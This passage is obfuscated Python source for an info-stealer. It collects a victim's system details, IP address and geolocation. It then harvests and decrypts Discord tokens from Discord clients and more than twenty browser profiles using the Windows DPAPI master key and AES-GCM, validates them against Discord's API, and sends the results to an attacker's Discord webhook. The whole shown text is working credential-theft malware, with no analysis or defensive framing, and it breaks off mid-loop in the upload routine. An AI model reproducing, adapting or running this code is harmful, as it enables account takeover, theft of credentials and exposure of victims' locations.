RAM  : {MVNSXTLQXRUJOZEGWKDDPHBACEGMCUABIXTUZTGTXDTJJGLHIVNOAXTQNNMWUEEDDQDEERMYGHEVHVFJMAGHQKKGTHIOYMGKFT}Go```""", inline=False)

    embed.add_field(name=":satellite: Ip:", value=f"""```Public : {DIIGDYAAUWWBZPQBVRJQEAAWOTNKVGRCDAOKRBUMTJQTQKWTRTANWZOPWFGSMV}
Local  : {BTVQXALGMQUZKWPVFTZIQYYYPDXORKRZXGYZSDIXNQEVXQEULRWNOL}
Isp    : {HOIRMENBGWWTETLBTPCHUHCDCIDFAGTJTKWPAKCLLLBCQVYKHKNPYLBYIOFRH}
Org    : {FLEAGKZLWERBMNUKMMDPJLGICSHVHJEBUHKQEFAKMTIKQBSFQBPZQWCIQNLQPJJBGXFFAMAWNZPQA}
As     : {USJSUQVQYAUUKHOYNWKJMMRVVGMINYQUNNYRODTEJKSLJTZGJTCRUHSDCJDVBMIZVQDEIYGVAQDXTMTJPGPHEAGDBKUEWOL}```""", inline=False)

    embed.add_field(name=":minidisc: Disk:", value=f"""```{SIUZALJVCBWGXWTFHESOXZFJLEVWABPRWJQVZIFGHVSLTTJWQXCXLHJNIWPRZWNXIQFOHVZLIGFAAHQYGDXIWRUOWLMHOIBI}```""", inline=False)

    embed.add_field(name=":map: Location:", value=f"""```Country   : {YLZHPTGZWJHGLFHVYQGGTAFICTJSTXKXCPRACFISHSAZELJYYJUPRHSYMDQZYCRECKUB} ({YLZHPTGZWJHGLFHVYQGGTAFICTJSTXKXCPRACFISHSAZELJYYJUPRHSYMDQZYCRECKUB_code})
Region    : {HADCIKZIFDJYRJUPBAIMXQCFRTUSNPPGWTCUHBJUREOEORYKSLRONPQKU} ({HADCIKZIFDJYRJUPBAIMXQCFRTUSNPPGWTCUHBJUREOEORYKSLRONPQKU_code})
Zip       : {HZZIADSXXAETAFMPOPWQWXJCUDLEAEJHCDFDECCNIEKZKUBUXANPUPCDSOBVMSGNGQGWYQNZQGELHJWYLHKWFXN}
City      : {ODKECATRNVDTJVCNRPIGAQGIIXXPRMCNVPIORIQYAVKISWSJBQWUEDPMXLFNCYIIRVKHOIKP}
Timezone  : {JXMDJSGJTGCYDOQKRYBCXVLODCHOCGJJUCVLDIIZZCXSEESQODLVHWZSPUDFR}
Latitude  : {MBBAGAXCZMJXRVAVBLBOLNNCHLJQTWOEEBZSKRTSBGVTJRQWPBTGZQXUCSNZZREABJXLDRSFFAYVD}
Longitude : {SGDQLQYEJARVVSBVTKREHMLCNGADUTMFOFKZJRRCUFARWLGVLAQEPFLGIIQKYFEYSKCPMVFTLFKY}```""", inline=False)

    embed.set_footer(text=KSBKANFPGYCJBXSWYLPSNWPMQAFEZUODOTNXCIKVZNALSEFUXEC, icon_url=TBGCRSDQCPGLXMLHZFGVKNHAPGDQMHGYECUFQGYBCHDVDZXJTTJGCAFXUENIJHEWNQHPXYWHJNOTCRJ)

    w3bh00k = SyncWebhook.from_url(BYBYBFOQOBVJYXNEPBZPTFJLCQLXILMKFMPSVOBREBZVBMLEOMTCQYPFRKLCRUPJSZHKWXFBAQMMATJBPDVQGELJ)
    w3bh00k.send(embed=embed, username=IAAZAQSFWWUDKOUTXKIWBSXMGRLRCSGOKOQPZJYGESQNYKYDIJXCJIKPKEEIVHIUEI, avatar_url=TBGCRSDQCPGLXMLHZFGVKNHAPGDQMHGYECUFQGYBCHDVDZXJTTJGCAFXUENIJHEWNQHPXYWHJNOTCRJ)

def Di5c0rd_T0k3n():
    import os
    import re
    import json
    import base64
    import requests
    from Cryptodome.Cipher import AES
    from Cryptodome.Protocol.KDF import scrypt
    from win32crypt import CryptUnprotectData
    from discord import SyncWebhook, Embed

    def extr4ct_t0k3n5():
        EAFECQMSRWVVIKVFEXZUBOPWXAZMMUJPFRYTGDPFIPUYPOXMQQXRVDHSEYKJMUZRSHBZCYQOHGHNNHSKFKKBNJAGVSLHO = "https://discord.com/api/v9/users/@me"
        CHMYXDMXBFJAAVHGNQLWZMJAJJWPKHROZQAQMAXYOLSNSQDCHQOSVDKPOOFNJUDYFQLOPGOUUQWZSHEYVJWOMZMCYSCVAX = os.getenv("localappdata")
        RASQXKTMGLQHMLTRUJMBSYSABSWRTLWGGGENJOHGBKQDMESZZVTEATECSUSTMVKJRRCXEVWLDIPASOOZUSJN = os.getenv("appdata")
        ZVRXPFAASSNVOGUHTKRFTOTSUTNJWXGPPFCJNKUEKTBUHELFKXORDYAOUDTKVPNTZCTSYYDKIOHYIDHJPAPI = r"[\w-]{24}\.[\w-]{6}\.[\w-]{25,110}"
        ZVRXPFAASSNVOGUHTKRFTOTSUTNJWXGPPFCJNKUEKTBUHELFKXORDYAOUDTKVPNTZCTSYYDKIOHYIDHJPAPI_enc = r"dQw4w9WgXcQ:[^\"]*"
        EMJDLPGFPKXITQVOFOAXQMTINTOJMBNGJBCQZTQORCUFRCXSNISULIGLQIDNTXIXZSMYSUCAJEKTLZZ = []
        GQWJORYGBDWSJRDPAQDRBRBBSUMDESOMSJEJQSOXUAZKNOLICPCHLBWSPXUCGGFDF = []
        GZSQZEVPBPZOYALWKUXKWSZDHTXOOOMOKSJURUCQDQHYFXVVUHPIFIMYTLYWZBRBKWGSEDLTDQZMSUEVW = {}

        LQOCMMRWDHHRXBJZYMFFEARYAWPWPABNQQDRGEWEQGLDMIWAOFEOGMYVCQRBMZMZSOKEGKUGVXKAMNGAKVAM = {
            'Discord': RASQXKTMGLQHMLTRUJMBSYSABSWRTLWGGGENJOHGBKQDMESZZVTEATECSUSTMVKJRRCXEVWLDIPASOOZUSJN + '\\discord\\Local Storage\\leveldb\\',
            'Discord Canary': RASQXKTMGLQHMLTRUJMBSYSABSWRTLWGGGENJOHGBKQDMESZZVTEATECSUSTMVKJRRCXEVWLDIPASOOZUSJN + '\\discordcanary\\Local Storage\\leveldb\\',
            'Lightcord': RASQXKTMGLQHMLTRUJMBSYSABSWRTLWGGGENJOHGBKQDMESZZVTEATECSUSTMVKJRRCXEVWLDIPASOOZUSJN + '\\Lightcord\\Local Storage\\leveldb\\',
            'Discord PTB': RASQXKTMGLQHMLTRUJMBSYSABSWRTLWGGGENJOHGBKQDMESZZVTEATECSUSTMVKJRRCXEVWLDIPASOOZUSJN + '\\discordptb\\Local Storage\\leveldb\\',
            'Opera': RASQXKTMGLQHMLTRUJMBSYSABSWRTLWGGGENJOHGBKQDMESZZVTEATECSUSTMVKJRRCXEVWLDIPASOOZUSJN + '\\Opera Software\\Opera Stable\\Local Storage\\leveldb\\',
            'Opera GX': RASQXKTMGLQHMLTRUJMBSYSABSWRTLWGGGENJOHGBKQDMESZZVTEATECSUSTMVKJRRCXEVWLDIPASOOZUSJN + '\\Opera Software\\Opera GX Stable\\Local Storage\\leveldb\\',
            'Amigo': CHMYXDMXBFJAAVHGNQLWZMJAJJWPKHROZQAQMAXYOLSNSQDCHQOSVDKPOOFNJUDYFQLOPGOUUQWZSHEYVJWOMZMCYSCVAX + '\\Amigo\\User Data\\Local Storage\\leveldb\\',
            'Torch': CHMYXDMXBFJAAVHGNQLWZMJAJJWPKHROZQAQMAXYOLSNSQDCHQOSVDKPOOFNJUDYFQLOPGOUUQWZSHEYVJWOMZMCYSCVAX + '\\Torch\\User Data\\Local Storage\\leveldb\\',
            'Kometa': CHMYXDMXBFJAAVHGNQLWZMJAJJWPKHROZQAQMAXYOLSNSQDCHQOSVDKPOOFNJUDYFQLOPGOUUQWZSHEYVJWOMZMCYSCVAX + '\\Kometa\\User Data\\Local Storage\\leveldb\\',
            'Orbitum': CHMYXDMXBFJAAVHGNQLWZMJAJJWPKHROZQAQMAXYOLSNSQDCHQOSVDKPOOFNJUDYFQLOPGOUUQWZSHEYVJWOMZMCYSCVAX + '\\Orbitum\\User Data\\Local Storage\\leveldb\\',
            'CentBrowser': CHMYXDMXBFJAAVHGNQLWZMJAJJWPKHROZQAQMAXYOLSNSQDCHQOSVDKPOOFNJUDYFQLOPGOUUQWZSHEYVJWOMZMCYSCVAX + '\\CentBrowser\\User Data\\Local Storage\\leveldb\\',
            '7Star': CHMYXDMXBFJAAVHGNQLWZMJAJJWPKHROZQAQMAXYOLSNSQDCHQOSVDKPOOFNJUDYFQLOPGOUUQWZSHEYVJWOMZMCYSCVAX + '\\7Star\\7Star\\User Data\\Local Storage\\leveldb\\',
            'Sputnik': CHMYXDMXBFJAAVHGNQLWZMJAJJWPKHROZQAQMAXYOLSNSQDCHQOSVDKPOOFNJUDYFQLOPGOUUQWZSHEYVJWOMZMCYSCVAX + '\\Sputnik\\Sputnik\\User Data\\Local Storage\\leveldb\\',
            'Vivaldi': CHMYXDMXBFJAAVHGNQLWZMJAJJWPKHROZQAQMAXYOLSNSQDCHQOSVDKPOOFNJUDYFQLOPGOUUQWZSHEYVJWOMZMCYSCVAX + '\\Vivaldi\\User Data\\Default\\Local Storage\\leveldb\\',
            'Google Chrome SxS': CHMYXDMXBFJAAVHGNQLWZMJAJJWPKHROZQAQMAXYOLSNSQDCHQOSVDKPOOFNJUDYFQLOPGOUUQWZSHEYVJWOMZMCYSCVAX + '\\Google\\Chrome SxS\\User Data\\Local Storage\\leveldb\\',
            'Google Chrome': CHMYXDMXBFJAAVHGNQLWZMJAJJWPKHROZQAQMAXYOLSNSQDCHQOSVDKPOOFNJUDYFQLOPGOUUQWZSHEYVJWOMZMCYSCVAX + '\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\',
            'Google Chrome1': CHMYXDMXBFJAAVHGNQLWZMJAJJWPKHROZQAQMAXYOLSNSQDCHQOSVDKPOOFNJUDYFQLOPGOUUQWZSHEYVJWOMZMCYSCVAX + '\\Google\\Chrome\\User Data\\Profile 1\\Local Storage\\leveldb\\',
            'Google Chrome2': CHMYXDMXBFJAAVHGNQLWZMJAJJWPKHROZQAQMAXYOLSNSQDCHQOSVDKPOOFNJUDYFQLOPGOUUQWZSHEYVJWOMZMCYSCVAX + '\\Google\\Chrome\\User Data\\Profile 2\\Local Storage\\leveldb\\',
            'Google Chrome3': CHMYXDMXBFJAAVHGNQLWZMJAJJWPKHROZQAQMAXYOLSNSQDCHQOSVDKPOOFNJUDYFQLOPGOUUQWZSHEYVJWOMZMCYSCVAX + '\\Google\\Chrome\\User Data\\Profile 3\\Local Storage\\leveldb\\',
            'Google Chrome4': CHMYXDMXBFJAAVHGNQLWZMJAJJWPKHROZQAQMAXYOLSNSQDCHQOSVDKPOOFNJUDYFQLOPGOUUQWZSHEYVJWOMZMCYSCVAX + '\\Google\\Chrome\\User Data\\Profile 4\\Local Storage\\leveldb\\',
            'Google Chrome5': CHMYXDMXBFJAAVHGNQLWZMJAJJWPKHROZQAQMAXYOLSNSQDCHQOSVDKPOOFNJUDYFQLOPGOUUQWZSHEYVJWOMZMCYSCVAX + '\\Google\\Chrome\\User Data\\Profile 5\\Local Storage\\leveldb\\',
            'Epic Privacy Browser': CHMYXDMXBFJAAVHGNQLWZMJAJJWPKHROZQAQMAXYOLSNSQDCHQOSVDKPOOFNJUDYFQLOPGOUUQWZSHEYVJWOMZMCYSCVAX + '\\Epic Privacy Browser\\User Data\\Local Storage\\leveldb\\',
            'Microsoft Edge': CHMYXDMXBFJAAVHGNQLWZMJAJJWPKHROZQAQMAXYOLSNSQDCHQOSVDKPOOFNJUDYFQLOPGOUUQWZSHEYVJWOMZMCYSCVAX + '\\Microsoft\\Edge\\User Data\\Default\\Local Storage\\leveldb\\',
            'Uran': CHMYXDMXBFJAAVHGNQLWZMJAJJWPKHROZQAQMAXYOLSNSQDCHQOSVDKPOOFNJUDYFQLOPGOUUQWZSHEYVJWOMZMCYSCVAX + '\\uCozMedia\\Uran\\User Data\\Default\\Local Storage\\leveldb\\',
            'Yandex': CHMYXDMXBFJAAVHGNQLWZMJAJJWPKHROZQAQMAXYOLSNSQDCHQOSVDKPOOFNJUDYFQLOPGOUUQWZSHEYVJWOMZMCYSCVAX + '\\Yandex\\YandexBrowser\\User Data\\Default\\Local Storage\\leveldb\\',
            'Brave': CHMYXDMXBFJAAVHGNQLWZMJAJJWPKHROZQAQMAXYOLSNSQDCHQOSVDKPOOFNJUDYFQLOPGOUUQWZSHEYVJWOMZMCYSCVAX + '\\BraveSoftware\\Brave-Browser\\User Data\\Default\\Local Storage\\leveldb\\',
            'Iridium': CHMYXDMXBFJAAVHGNQLWZMJAJJWPKHROZQAQMAXYOLSNSQDCHQOSVDKPOOFNJUDYFQLOPGOUUQWZSHEYVJWOMZMCYSCVAX + '\\Iridium\\User Data\\Default\\Local Storage\\leveldb\\'
        }

        for QEGKLOAPTBSPMOJOFPSKSUADBKOFHWOQLDSINQLAUPMJEXEQWKWBSSXQOFNVBLAOGJYYHLSSZYPJXQSEFN, FENKEECUWQJWVBCAWKOYINLMZDJVEEWOYGGCLGQDFDVKMSTZZAIRL in LQOCMMRWDHHRXBJZYMFFEARYAWPWPABNQQDRGEWEQGLDMIWAOFEOGMYVCQRBMZMZSOKEGKUGVXKAMNGAKVAM.items():
            if not os.path.exists(FENKEECUWQJWVBCAWKOYINLMZDJVEEWOYGGCLGQDFDVKMSTZZAIRL):
                continue
            CLEVYNVWAPHJKNGZDODFMRDZFCFUAHBAIWBYQVBVRKUHLXEXCZEEBJIKUBEZOWCAHQGRK = QEGKLOAPTBSPMOJOFPSKSUADBKOFHWOQLDSINQLAUPMJEXEQWKWBSSXQOFNVBLAOGJYYHLSSZYPJXQSEFN.replace(" ", "").lower()
            if "cord" in FENKEECUWQJWVBCAWKOYINLMZDJVEEWOYGGCLGQDFDVKMSTZZAIRL:
                if not os.path.exists(RASQXKTMGLQHMLTRUJMBSYSABSWRTLWGGGENJOHGBKQDMESZZVTEATECSUSTMVKJRRCXEVWLDIPASOOZUSJN + f'\\{CLEVYNVWAPHJKNGZDODFMRDZFCFUAHBAIWBYQVBVRKUHLXEXCZEEBJIKUBEZOWCAHQGRK}\\Local State'):
                    continue
                for v4r_file_name in os.listdir(FENKEECUWQJWVBCAWKOYINLMZDJVEEWOYGGCLGQDFDVKMSTZZAIRL):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    with open(f'{FENKEECUWQJWVBCAWKOYINLMZDJVEEWOYGGCLGQDFDVKMSTZZAIRL}\\{v4r_file_name}', errors='ignore') as v4r_file:
                        for v4r_line in v4r_file:
                            for y in re.findall(ZVRXPFAASSNVOGUHTKRFTOTSUTNJWXGPPFCJNKUEKTBUHELFKXORDYAOUDTKVPNTZCTSYYDKIOHYIDHJPAPI_enc, v4r_line.strip()):
                                LTJAYKCACQBYIWERPCYNAHRXLAXGOSICYIYZWQOLFPVGDOLAVNYJBZYYNLCGPECBI = decrypt_val(base64.b64decode(y.split('dQw4w9WgXcQ:')[1]), get_master_key(RASQXKTMGLQHMLTRUJMBSYSABSWRTLWGGGENJOHGBKQDMESZZVTEATECSUSTMVKJRRCXEVWLDIPASOOZUSJN + f'\\{CLEVYNVWAPHJKNGZDODFMRDZFCFUAHBAIWBYQVBVRKUHLXEXCZEEBJIKUBEZOWCAHQGRK}\\Local State'))
                                if validate_t0k3n(LTJAYKCACQBYIWERPCYNAHRXLAXGOSICYIYZWQOLFPVGDOLAVNYJBZYYNLCGPECBI, EAFECQMSRWVVIKVFEXZUBOPWXAZMMUJPFRYTGDPFIPUYPOXMQQXRVDHSEYKJMUZRSHBZCYQOHGHNNHSKFKKBNJAGVSLHO):
                                    ENVRMLYRZOHJYMBCMXVPLKLELYJTZBYSVTKSLNLVJUXAYIQWDIIZTETXAFQUWFSTYJDTJYYTDDNZWQNUVSVVHX = requests.get(EAFECQMSRWVVIKVFEXZUBOPWXAZMMUJPFRYTGDPFIPUYPOXMQQXRVDHSEYKJMUZRSHBZCYQOHGHNNHSKFKKBNJAGVSLHO, headers={'Authorization': LTJAYKCACQBYIWERPCYNAHRXLAXGOSICYIYZWQOLFPVGDOLAVNYJBZYYNLCGPECBI}).json()['id']
                                    if ENVRMLYRZOHJYMBCMXVPLKLELYJTZBYSVTKSLNLVJUXAYIQWDIIZTETXAFQUWFSTYJDTJYYTDDNZWQNUVSVVHX not in GQWJORYGBDWSJRDPAQDRBRBBSUMDESOMSJEJQSOXUAZKNOLICPCHLBWSPXUCGGFDF:
                                        EMJDLPGFPKXITQVOFOAXQMTINTOJMBNGJBCQZTQORCUFRCXSNISULIGLQIDNTXIXZSMYSUCAJEKTLZZ.append(LTJAYKCACQBYIWERPCYNAHRXLAXGOSICYIYZWQOLFPVGDOLAVNYJBZYYNLCGPECBI)
                                        GQWJORYGBDWSJRDPAQDRBRBBSUMDESOMSJEJQSOXUAZKNOLICPCHLBWSPXUCGGFDF.append(ENVRMLYRZOHJYMBCMXVPLKLELYJTZBYSVTKSLNLVJUXAYIQWDIIZTETXAFQUWFSTYJDTJYYTDDNZWQNUVSVVHX)
                                        GZSQZEVPBPZOYALWKUXKWSZDHTXOOOMOKSJURUCQDQHYFXVVUHPIFIMYTLYWZBRBKWGSEDLTDQZMSUEVW[LTJAYKCACQBYIWERPCYNAHRXLAXGOSICYIYZWQOLFPVGDOLAVNYJBZYYNLCGPECBI] = (QEGKLOAPTBSPMOJOFPSKSUADBKOFHWOQLDSINQLAUPMJEXEQWKWBSSXQOFNVBLAOGJYYHLSSZYPJXQSEFN, f"{FENKEECUWQJWVBCAWKOYINLMZDJVEEWOYGGCLGQDFDVKMSTZZAIRL}\\{v4r_file_name}")
            else:
                for v4r_file_name in os.listdir(FENKEECUWQJWVBCAWKOYINLMZDJVEEWOYGGCLGQDFDVKMSTZZAIRL):
                    if v4r_file_name[-3:] not in ["log", "ldb"]:
                        continue
                    with open(f'{FENKEECUWQJWVBCAWKOYINLMZDJVEEWOYGGCLGQDFDVKMSTZZAIRL}\\{v4r_file_name}', errors='ignore') as v4r_file:
                        for v4r_line in v4r_file:
                            for LTJAYKCACQBYIWERPCYNAHRXLAXGOSICYIYZWQOLFPVGDOLAVNYJBZYYNLCGPECBI in re.findall(ZVRXPFAASSNVOGUHTKRFTOTSUTNJWXGPPFCJNKUEKTBUHELFKXORDYAOUDTKVPNTZCTSYYDKIOHYIDHJPAPI, v4r_line.strip()):
                                if validate_t0k3n(LTJAYKCACQBYIWERPCYNAHRXLAXGOSICYIYZWQOLFPVGDOLAVNYJBZYYNLCGPECBI, EAFECQMSRWVVIKVFEXZUBOPWXAZMMUJPFRYTGDPFIPUYPOXMQQXRVDHSEYKJMUZRSHBZCYQOHGHNNHSKFKKBNJAGVSLHO):
                                    ENVRMLYRZOHJYMBCMXVPLKLELYJTZBYSVTKSLNLVJUXAYIQWDIIZTETXAFQUWFSTYJDTJYYTDDNZWQNUVSVVHX = requests.get(EAFECQMSRWVVIKVFEXZUBOPWXAZMMUJPFRYTGDPFIPUYPOXMQQXRVDHSEYKJMUZRSHBZCYQOHGHNNHSKFKKBNJAGVSLHO, headers={'Authorization': LTJAYKCACQBYIWERPCYNAHRXLAXGOSICYIYZWQOLFPVGDOLAVNYJBZYYNLCGPECBI}).json()['id']
                                    if ENVRMLYRZOHJYMBCMXVPLKLELYJTZBYSVTKSLNLVJUXAYIQWDIIZTETXAFQUWFSTYJDTJYYTDDNZWQNUVSVVHX not in GQWJORYGBDWSJRDPAQDRBRBBSUMDESOMSJEJQSOXUAZKNOLICPCHLBWSPXUCGGFDF:
                                        EMJDLPGFPKXITQVOFOAXQMTINTOJMBNGJBCQZTQORCUFRCXSNISULIGLQIDNTXIXZSMYSUCAJEKTLZZ.append(LTJAYKCACQBYIWERPCYNAHRXLAXGOSICYIYZWQOLFPVGDOLAVNYJBZYYNLCGPECBI)
                                        GQWJORYGBDWSJRDPAQDRBRBBSUMDESOMSJEJQSOXUAZKNOLICPCHLBWSPXUCGGFDF.append(ENVRMLYRZOHJYMBCMXVPLKLELYJTZBYSVTKSLNLVJUXAYIQWDIIZTETXAFQUWFSTYJDTJYYTDDNZWQNUVSVVHX)
                                        GZSQZEVPBPZOYALWKUXKWSZDHTXOOOMOKSJURUCQDQHYFXVVUHPIFIMYTLYWZBRBKWGSEDLTDQZMSUEVW[LTJAYKCACQBYIWERPCYNAHRXLAXGOSICYIYZWQOLFPVGDOLAVNYJBZYYNLCGPECBI] = (QEGKLOAPTBSPMOJOFPSKSUADBKOFHWOQLDSINQLAUPMJEXEQWKWBSSXQOFNVBLAOGJYYHLSSZYPJXQSEFN, f"{FENKEECUWQJWVBCAWKOYINLMZDJVEEWOYGGCLGQDFDVKMSTZZAIRL}\\{v4r_file_name}")

        if os.path.exists(RASQXKTMGLQHMLTRUJMBSYSABSWRTLWGGGENJOHGBKQDMESZZVTEATECSUSTMVKJRRCXEVWLDIPASOOZUSJN + "\\Mozilla\\Firefox\\Profiles"):
            for FENKEECUWQJWVBCAWKOYINLMZDJVEEWOYGGCLGQDFDVKMSTZZAIRL, _, v4r_files in os.walk(RASQXKTMGLQHMLTRUJMBSYSABSWRTLWGGGENJOHGBKQDMESZZVTEATECSUSTMVKJRRCXEVWLDIPASOOZUSJN + "\\Mozilla\\Firefox\\Profiles"):
                for v4r__file in v4r_files:
                    if v4r__file.endswith('.sqlite'):
                        with open(f'{FENKEECUWQJWVBCAWKOYINLMZDJVEEWOYGGCLGQDFDVKMSTZZAIRL}\\{v4r__file}', errors='ignore') as v4r_file:
                            for v4r_line in v4r_file:
                                for LTJAYKCACQBYIWERPCYNAHRXLAXGOSICYIYZWQOLFPVGDOLAVNYJBZYYNLCGPECBI in re.findall(ZVRXPFAASSNVOGUHTKRFTOTSUTNJWXGPPFCJNKUEKTBUHELFKXORDYAOUDTKVPNTZCTSYYDKIOHYIDHJPAPI, v4r_line.strip()):
                                    if validate_t0k3n(LTJAYKCACQBYIWERPCYNAHRXLAXGOSICYIYZWQOLFPVGDOLAVNYJBZYYNLCGPECBI, EAFECQMSRWVVIKVFEXZUBOPWXAZMMUJPFRYTGDPFIPUYPOXMQQXRVDHSEYKJMUZRSHBZCYQOHGHNNHSKFKKBNJAGVSLHO):
                                        ENVRMLYRZOHJYMBCMXVPLKLELYJTZBYSVTKSLNLVJUXAYIQWDIIZTETXAFQUWFSTYJDTJYYTDDNZWQNUVSVVHX = requests.get(EAFECQMSRWVVIKVFEXZUBOPWXAZMMUJPFRYTGDPFIPUYPOXMQQXRVDHSEYKJMUZRSHBZCYQOHGHNNHSKFKKBNJAGVSLHO, headers={'Authorization': LTJAYKCACQBYIWERPCYNAHRXLAXGOSICYIYZWQOLFPVGDOLAVNYJBZYYNLCGPECBI}).json()['id']
                                        if ENVRMLYRZOHJYMBCMXVPLKLELYJTZBYSVTKSLNLVJUXAYIQWDIIZTETXAFQUWFSTYJDTJYYTDDNZWQNUVSVVHX not in GQWJORYGBDWSJRDPAQDRBRBBSUMDESOMSJEJQSOXUAZKNOLICPCHLBWSPXUCGGFDF:
                                            EMJDLPGFPKXITQVOFOAXQMTINTOJMBNGJBCQZTQORCUFRCXSNISULIGLQIDNTXIXZSMYSUCAJEKTLZZ.append(LTJAYKCACQBYIWERPCYNAHRXLAXGOSICYIYZWQOLFPVGDOLAVNYJBZYYNLCGPECBI)
                                            GQWJORYGBDWSJRDPAQDRBRBBSUMDESOMSJEJQSOXUAZKNOLICPCHLBWSPXUCGGFDF.append(ENVRMLYRZOHJYMBCMXVPLKLELYJTZBYSVTKSLNLVJUXAYIQWDIIZTETXAFQUWFSTYJDTJYYTDDNZWQNUVSVVHX)
                                            GZSQZEVPBPZOYALWKUXKWSZDHTXOOOMOKSJURUCQDQHYFXVVUHPIFIMYTLYWZBRBKWGSEDLTDQZMSUEVW[LTJAYKCACQBYIWERPCYNAHRXLAXGOSICYIYZWQOLFPVGDOLAVNYJBZYYNLCGPECBI] = ('Firefox', f"{FENKEECUWQJWVBCAWKOYINLMZDJVEEWOYGGCLGQDFDVKMSTZZAIRL}\\{v4r__file}")
        return EMJDLPGFPKXITQVOFOAXQMTINTOJMBNGJBCQZTQORCUFRCXSNISULIGLQIDNTXIXZSMYSUCAJEKTLZZ, GZSQZEVPBPZOYALWKUXKWSZDHTXOOOMOKSJURUCQDQHYFXVVUHPIFIMYTLYWZBRBKWGSEDLTDQZMSUEVW

    def validate_t0k3n(LTJAYKCACQBYIWERPCYNAHRXLAXGOSICYIYZWQOLFPVGDOLAVNYJBZYYNLCGPECBI, EAFECQMSRWVVIKVFEXZUBOPWXAZMMUJPFRYTGDPFIPUYPOXMQQXRVDHSEYKJMUZRSHBZCYQOHGHNNHSKFKKBNJAGVSLHO):
        return requests.get(EAFECQMSRWVVIKVFEXZUBOPWXAZMMUJPFRYTGDPFIPUYPOXMQQXRVDHSEYKJMUZRSHBZCYQOHGHNNHSKFKKBNJAGVSLHO, headers={'Authorization': LTJAYKCACQBYIWERPCYNAHRXLAXGOSICYIYZWQOLFPVGDOLAVNYJBZYYNLCGPECBI}).status_code == 200

    def decrypt_val(PTBETZCLJQQMCNZMKXMJSBEEHKFXIJLVTIGLIJVZZFXWKXXDQFFNCEFTC, v4r_master_key):
        v4r_iv = PTBETZCLJQQMCNZMKXMJSBEEHKFXIJLVTIGLIJVZZFXWKXXDQFFNCEFTC[3:15]
        v4r_payload = PTBETZCLJQQMCNZMKXMJSBEEHKFXIJLVTIGLIJVZZFXWKXXDQFFNCEFTC[15:]
        v4r_cipher = AES.new(v4r_master_key, AES.MODE_GCM, v4r_iv)
        return v4r_cipher.decrypt(v4r_payload)[:-16].decode()

    def get_master_key(FENKEECUWQJWVBCAWKOYINLMZDJVEEWOYGGCLGQDFDVKMSTZZAIRL):
        if not os.path.exists(FENKEECUWQJWVBCAWKOYINLMZDJVEEWOYGGCLGQDFDVKMSTZZAIRL):
            return None
        with open(FENKEECUWQJWVBCAWKOYINLMZDJVEEWOYGGCLGQDFDVKMSTZZAIRL, "r", encoding="utf-8") as v4r_f:
            v4r_local_state = json.load(v4r_f)
        v4r_master_key = base64.b64decode(v4r_local_state["os_crypt"]["encrypted_key"])[5:]
        return CryptUnprotectData(v4r_master_key, None, None, None, 0)[1]

    def upload_t0k3n5():
        EMJDLPGFPKXITQVOFOAXQMTINTOJMBNGJBCQZTQORCUFRCXSNISULIGLQIDNTXIXZSMYSUCAJEKTLZZ, GZSQZEVPBPZOYALWKUXKWSZDHTXOOOMOKSJURUCQDQHYFXVVUHPIFIMYTLYWZBRBKWGSEDLTDQZMSUEVW = extr4ct_t0k3n5()
        BGNCUWDDFLFLYPLGGYVDOANWADHXAUGIWDHFAOYGBWIOIJCPNRFYMPBEWKUPWMFNKFNZC = SyncWebhook.from_url(BYBYBFOQOBVJYXNEPBZPTFJLCQLXILMKFMPSVOBREBZVBMLEOMTCQYPFRKLCRUPJSZHKWXFBAQMMATJBPDVQGELJ)

        if not EMJDLPGFPKXITQVOFOAXQMTINTOJMBNGJBCQZTQORCUFRCXSNISULIGLQIDNTXIXZSMYSUCAJEKTLZZ:
            IMKDHHMUATUPNGRDIGTMFTIKOPLDISDRYCJVVZEAGRYGWQQKWZCTDIWWPVJVYBLFWVPOMFPQXOQPARUMEWKHANVCOGADCPPR = Embed(
                title=f'Discord Token `{BSAFUUSPGJPQKPFKTUDSHOPGXHGVEMHYGJMTSTDTPURCJPBJFSD} "{DIIGDYAAUWWBZPQBVRJQEAAWOTNKVGRCDAOKRBUMTJQTQKWTRTANWZOPWFGSMV}"`:', 
                description=f"No discord tokens found.",
                color=PFHVDVLRCIKQFKZKMAXBUFSXESZFEQFFSDQHJIHCEWODXJJGXJXVVQYBNPUCBUSRCOPDHXXOWNPCZMMABKVJTUWEUU)
            IMKDHHMUATUPNGRDIGTMFTIKOPLDISDRYCJVVZEAGRYGWQQKWZCTDIWWPVJVYBLFWVPOMFPQXOQPARUMEWKHANVCOGADCPPR.set_footer(text=KSBKANFPGYCJBXSWYLPSNWPMQAFEZUODOTNXCIKVZNALSEFUXEC, icon_url=TBGCRSDQCPGLXMLHZFGVKNHAPGDQMHGYECUFQGYBCHDVDZXJTTJGCAFXUENIJHEWNQHPXYWHJNOTCRJ)
            BGNCUWDDFLFLYPLGGYVDOANWADHXAUGIWDHFAOYGBWIOIJCPNRFYMPBEWKUPWMFNKFNZC.send(embed=IMKDHHMUATUPNGRDIGTMFTIKOPLDISDRYCJVVZEAGRYGWQQKWZCTDIWWPVJVYBLFWVPOMFPQXOQPARUMEWKHANVCOGADCPPR, username=IAAZAQSFWWUDKOUTXKIWBSXMGRLRCSGOKOQPZJYGESQNYKYDIJXCJIKPKEEIVHIUEI, avatar_url=TBGCRSDQCPGLXMLHZFGVKNHAPGDQMHGYECUFQGYBCHDVDZXJTTJGCAFXUENIJHEWNQHPXYWHJNOTCRJ)
            return
        
        for LTJAYKCACQBYIWERPCYNAHRXLAXGOSICYIYZWQOLFPVGDOLAVNYJBZYYNLCGPECBI_d15c0rd in EMJDLPGFPKXITQVOFOAXQMTINTOJMBNGJBCQZTQORCUFRCXSNISULIGLQIDNTXIXZSMYSUCAJEKTLZZ:
            XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII = requests.get('https://discord.com/api/v8/users/@me', headers={'Authorization': LTJAYKCACQBYIWERPCYNAHRXLAXGOSICYIYZWQOLFPVGDOLAVNYJBZYYNLCGPECBI_d15c0rd}).json()

            RONCHLDFULPAIYNULEEOTKSYKZTFFLLPAITRLYQKIPCWQKTOUJGLWTSDHWHCR = XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('username', "None") + '#' + XADOROAFWOKZTRWUNGHSCIJFDLLGHQJNNMGLTJHRRLAJIHDBJTSSWZXDFPCSHKMAZII.get('discriminator', "None")
